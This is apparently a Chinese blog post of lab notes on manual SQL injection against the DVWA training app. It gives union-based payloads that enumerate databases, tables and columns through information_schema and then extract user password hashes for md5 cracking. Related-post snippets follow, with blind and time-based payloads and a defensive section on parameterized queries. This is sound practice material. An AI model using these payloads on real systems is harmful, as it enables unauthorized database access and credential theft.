dvwa之sql injection(low)手工注入笔记

最新推荐文章于 2025-07-07 20:50:12 发布
原创 最新推荐文章于 2025-07-07 20:50:12 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dvwa #手工注入 #sql

本文介绍如何利用SQL注入漏洞,通过不同方法确定字段数量,并展示如何使用union select获取数据库信息,包括数据库名、用户名、表名及列名等内容。

首先使用1,2,3,4,5都会返回用户列表

然后再使用1'进行判断,发现报错,既知道存在注入漏洞

使用语句 1' and '1' ='1 的时候会出现正常:


当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果:

分析字段数(两种方法)


 

方法一:用order by语句。(默认是进行升序的)

分析字段数的原因是我们之后需要用unionselect语句来获得我们需要的敏感数据。根据orderby知识知道,要是后面跟着的数字超出了字段数时,就会报错!通过这个我们可以确定字段数。我们构造的payload如下:

1' order by 1#


1' order by 2#


1' order by 3#


此时 当输入到3的时候,发现它报错了,也就是说字段数为2。

 

方法二:直接用unionselect来猜测字段数。

因为当字段数不对应的时候,它也是会发生报错的!我们构造以下查询语句:

1' union select 1#

1' union select 1,2#

1' union select 1,2,3#


 可以发现,当union select1,2,3的时候报错,union select1,2的时候没有报错,也就是说字段数为2。同时,我们也注意到,好像返回的内容中多了三条数据,这是啥呢?其实这就是我们unionselect出来的数据。这样通过查看页面,我们便可以获得数据库里面的信息了!

获取信息

字段数为2,说明数据列有两列。我们可以通过unionselect语句查出两个数据。好了,我们来获取所需要的数据库里面的信息吧!

 获取当前数据库名,当前用户名

构造数据库查询语句如下所示:

1' union select database(),user()#


解释一下,database()将会返回当前网站所使用的数据库名字,user()将会返回进行当前查询的用户名。

好的,我们可以看到当前使用的数据库为:dvwa,当前的用户名:root@localhost

  

当mysql的版本大于5.0时,有个默认的数据库information_schema,里面存放着所有数据库的信息,比如数据库名、表名、列名等

1' and 1=2 union select 1, schema_name from information_schema.schemata; --
1' and 1=2 union select 1, schema_name from information_schema.schemata; --  (--后面有一个空格)


由此知道数据库中有6个数据库


然后使用下面的语句进行爆表

1' and 1=2 union select table_schema,table_name from information_schema.tables; -- (注意此处有空格)


现在我们知道了dvwa数据库中有两个表,分别是guestbook和users,下面我们构造SQL语句得到users表中的所有属性列

爆出列值

1' and 1=2 union select table_name, column_name from information_schema.columns; -- (--后面有一个空格)


上面的语句返回了各个表中的所有属性列,users表的结果如下:

现在我们知道了users表中的所有属性列名称了,我们可以查询自己感兴趣的东西,比如说用户的user_id和password

(4)爆密码

1' and 1=2 union select user_id,password from dvwa.uesr ; -- (注意空格)

1' and 1=2 union select user_id,password from dvwa.users; --

上面的语句返回了用户ID和其对应的密码,结果如下:


然后就是使用md5进行解密了


以上部分内容参照互联网部分数据




DVWA靶场系列(五)—— SQL InjectionSQL注入
qq_45612828的博客
07-14 2352
DVWA靶场系列(五)—— SQL InjectionSQL注入
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY
2401_83237906的博客
04-06 1246
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?
DVWA下的SQL Injection(Blind)
07-25
盲注
新手指南:DVWA-1.9全级别教程之SQL Injection
weixin_30345577的博客
09-12 520
*本文原创作者:lonehand,转载须注明来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。 DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用...
DVWASQL Injection(Blind)
谢公子的博客
08-05 2989
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
mysqlsql手工注入基于回显,DVWASQL回显注入
weixin_30311179的博客
03-18 407
一.SQL注入简介1.1 SQL语句就是操作数据库的语句,SQL注入就是通过web程序在数据库里执行任意SQL语句。SQL注入是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问和修改数据,或者利用潜在的数据库漏洞进行攻击。1.2 SQL注入漏洞威胁(1).猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。(2).绕过认证,列如绕过验证登录网站后台。(3).注入可以借助数据库的存储过程...
DVWA进行sql注入
weixin_44901204的博客
08-23 488
1.判断是否有注入漏洞 打开DVWA,在SQL注入中输入1,返回正常。 输入1’,报错,返回 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1...
DVWA | SQL Injection 数据库注入
qq_44846097的博客
07-07 989
SQL注入是一种通过在输入字段中插入恶意SQL代码来操控数据库查询的攻击方式。常见类型包括堆叠查询、联合查询、布尔盲注、时间盲注等。攻击者可借此窃取敏感数据、篡改或删除数据,甚至获取服务器权限等等。
DVWA靶场练习(六)—— SQL Injection
liuzibo1024的博客
10-24 654
SQL注入SQL Injection)是一种常见的网络攻击手段,它允许攻击者插入或“注入”一个或多个SQL语句到原本的查询中,从而改变原有SQL语句的意图。这种攻击主要针对那些没有正确处理用户输入数据的应用程序。本实验的目标是获取数据库中用户的密码。
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 483
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA1.9 SQL注入全等级手工注入流程
Wh0ami
12-21 2632
最近想复习一下手工sql注入,下面我将通过DVWA1.9进行一遍手工注入过程。 low 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取...
DVWA SQL注入手工注入
马赛克的博客
03-21 3811
本次使用的靶机是看雪论坛为我们提供的在线靶机 地址:http://43.247.91.228:81 账号:admin 密码:password 一:Low级别注入 1. 先在文本框中输入1,单击submit,查看效果 手注的思路:确定页面使用了多少个字段,然后确定各个字段的位置,最后构造SQL语句进行注入 2. 在文本框中输入 1' order by 2#返回正常 1...
DVWA——SQL注入
hand2some2的博客
07-24 210
这关相较于前两关,它限制了查询的数量,每次只能返回一条数据,剩余的和Low级别的一样,因此这里可以用 # 或 -- 来将它的limit语句给注释掉从而达到Low级别的效果。输入 1‘ ,发现报错,推断是字符串类型漏洞。输入1,显示正确,可以推断出并不是数字型漏洞。为什么要这样输入呢?输入:1' or '1'='1。用hackbar测试。
云曦暑期学习第一周——sql注入
2202_75317918的博客
07-19 1399
云曦暑期学习第一周——sql注入
sql注入掌握的基础,以sql-labs为例子
weixin_62784719的博客
02-15 364
sql注入的一般步骤
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 3912
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
手工SQL注入语句
weixin_64765239的博客
08-27 771
手工SQL注入语句保姆级详解
mysql and 1=1_mysql-左联接on子句中的“ AND 1” /“ AND 0”...
weixin_36300275的博客
01-19 820
1和0在MySQL中是TRUE和FALSE的同义词.因此,以下条件相同:erh.ExpenseReportHeaderID = erli.ExpenseReportHeaderID AND 1erh.ExpenseReportHeaderID = erli.ExpenseReportHeaderID AND TRUEerh.ExpenseReportHeaderID = erli.ExpenseR...
DVWA靶场SQL Injection (Blind) SQL注入
最新发布
09-11
### SQL Injection (Blind) 简介 SQL Injection (Blind)即 SQL 盲注,是一种特殊的 SQL 注入攻击方式。在这种攻击中,攻击者无法直接从应用程序的响应中获取 SQL 查询的结果,而是通过构造特殊的 SQL 语句,根据应用程序返回的不同响应(如页面响应时间、页面显示内容的变化等)来推断数据库中的信息。 ### 攻击方法 #### 基于布尔的盲注 攻击者通过构造 SQL 语句,使数据库根据条件返回不同的结果,通过判断应用程序的响应来确定条件是否成立,逐步获取数据库信息。例如,在登录框输入用户名 `' AND 1=1 --` 和 `' AND 1=2 --`,如果前者登录成功而后者失败,说明存在 SQL 盲注漏洞,且数据库能够正确处理 `1=1` 这个条件。 #### 基于时间的盲注 当应用程序对所有 SQL 查询的响应都是相同的,无法通过布尔判断时,攻击者可以利用数据库的延时函数,通过判断应用程序的响应时间来推断信息。例如,构造 SQL 语句 `' AND SLEEP(5) --`,如果应用程序响应时间明显增加了 5 秒,就说明存在 SQL 盲注漏洞。 ### 防护措施 #### 输入验证 对用户输入的数据进行严格的验证和过滤,只允许合法的字符和格式。例如,对于数字类型的输入,只允许输入数字字符;对于字符串类型的输入,去除特殊字符和 SQL 关键字。 ```python import re def validate_input(input_data): # 只允许字母和数字 pattern = re.compile(r'^[a-zA-Z0-9]+$') if pattern.match(input_data): return True return False ``` #### 使用参数化查询 使用数据库提供的参数化查询功能,将用户输入的数据作为参数传递给 SQL 语句,而不是直接拼接在 SQL 语句中。这样可以防止 SQL 注入攻击,因为数据库会自动处理参数的转义。例如,在 Python 中使用 `sqlite3` 进行参数化查询: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "test' OR '1'='1" password = "password" # 使用参数化查询 cursor.execute("SELECT * FROM users WHERE username =? AND password =?", (username, password)) result = cursor.fetchone() ``` #### 最小化数据库权限 为应用程序分配最小的数据库权限,只允许其执行必要的操作。例如,如果应用程序只需要查询数据,就不授予其插入、更新和删除数据的权限。 ### 案例 假设存在一个简单的用户信息查询页面,用户可以通过输入用户 ID 来查询用户信息。页面的 SQL 查询语句如下: ```sql SELECT * FROM users WHERE id = '$id'; ``` 攻击者可以构造如下的 SQL 盲注语句来获取数据库信息: - 基于布尔的盲注:输入 `1' AND (SELECT COUNT(*) FROM users) > 10 --`,如果页面显示正常,说明用户表中的记录数大于 10;如果页面报错或显示异常,说明记录数小于等于 10。 - 基于时间的盲注:输入 `1' AND SLEEP(5) --`,如果页面响应时间明显增加了 5 秒,说明存在 SQL 盲注漏洞。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值